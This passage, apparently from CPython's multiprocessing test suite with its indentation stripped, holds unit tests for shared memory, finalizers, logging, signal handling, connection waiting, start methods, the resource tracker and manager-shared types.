self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# Abruptly killing a process that holds a reference to a shared memory
# segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions here: after fork() the child keeps only the thread that called fork()
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
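# wait() may return the ready objects in any order, so sort both sides by id()
# before comparing.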
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
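# The template above is formatted per resource type: {rtype} selects the resource
# to create and {w} is the write end of a pipe used to report the resource names
# back to this process.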
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit tests the base type is created in the parent
process; the @classmethod represents the worker process, and the
shared object is readable and editable by both.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
